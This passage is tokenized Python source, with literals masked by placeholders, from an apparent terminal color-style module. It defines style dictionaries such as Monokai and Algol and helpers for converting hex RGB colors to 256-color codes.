'<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:100>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> 
'<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , 
<EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : 
'<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> RE_RGB3 = re . compile ( r'<STR_LIT>' ) <EOL> RE_RGB6 = re . compile ( r'<STR_LIT>' ) <EOL> def rgb_to_ints ( rgb ) : <EOL> """<STR_LIT>""" <EOL> if len ( rgb ) == <NUM_LIT:6> : <EOL> return tuple ( [ int ( h , <NUM_LIT:16> ) for h in RE_RGB6 . split ( rgb ) [ <NUM_LIT:1> : <NUM_LIT:4> ] ] ) <EOL> else : <EOL> return tuple ( [ int ( h * <NUM_LIT:2> , <NUM_LIT:16> ) for h in RE_RGB3 . split ( rgb ) [ <NUM_LIT:1> : <NUM_LIT:4> ] ] ) <EOL> def rgb_to_256 ( rgb ) : <EOL> """<STR_LIT>""" <EOL> rgb = rgb . lstrip ( '<STR_LIT:#>' ) <EOL> if len ( rgb ) == <NUM_LIT:0> : <EOL> return '<STR_LIT:0>' , '<STR_LIT>' <EOL> incs = ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> parts = rgb_to_ints ( rgb ) <EOL> res = [ ] <EOL> for part in parts : <EOL> i = <NUM_LIT:0> <EOL> while i < len ( incs ) - <NUM_LIT:1> : <EOL> s , b = incs [ i ] , incs [ i + <NUM_LIT:1> ] <EOL> if s <= part <= b : <EOL> s1 = abs ( s - part ) <EOL> b1 = abs ( b - part ) <EOL> if s1 < b1 : closest = s <EOL> else : closest = b <EOL> res . append ( closest ) <EOL> break <EOL> i += <NUM_LIT:1> <EOL> res = '<STR_LIT>' . join ( [ ( '<STR_LIT>' % i ) for i in res ] ) <EOL> equiv = RGB_256 [ res ] <EOL> return equiv , res <EOL> def color_style_names ( ) : <EOL> """<STR_LIT>""" <EOL> return STYLES . keys ( ) <EOL> def color_style ( style = '<STR_LIT:default>' ) : <EOL> """<STR_LIT>""" <EOL> if style in STYLES : <EOL> cmap = STYLES [ style ] <EOL> else : <EOL> warn ( '<STR_LIT>' . 
format ( style ) , <EOL> RuntimeWarning ) <EOL> cmap = DEFAULT_STYLE <EOL> return cmap <EOL> def _expand_style ( cmap ) : <EOL> """<STR_LIT>""" <EOL> for key , val in list ( cmap . items ( ) ) : <EOL> if key == '<STR_LIT>' : <EOL> continue <EOL> elif len ( val ) == <NUM_LIT:0> : <EOL> cmap [ '<STR_LIT>' + key ] = '<STR_LIT:1>' <EOL> cmap [ '<STR_LIT>' + key ] = '<STR_LIT:4>' <EOL> cmap [ '<STR_LIT>' + key ] = '<STR_LIT>' <EOL> cmap [ '<STR_LIT>' + key ] = val <EOL> else : <EOL> cmap [ '<STR_LIT>' + key ] = '<STR_LIT>' + val <EOL> cmap [ '<STR_LIT>' + key ] = '<STR_LIT>' + val <EOL> cmap [ '<STR_LIT>' + key ] = '<STR_LIT>' + val <EOL> cmap [ '<STR_LIT>' + key ] = val . replace ( '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> BW_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> _expand_style ( BW_STYLE ) <EOL> DEFAULT_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : 
'<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> 
'<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> MONOKAI_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> _expand_style ( MONOKAI_STYLE ) <EOL> ALGOL_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , 
<EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> ALGOL_NU_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : 
'<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> 
'<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> AUTUMN_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : 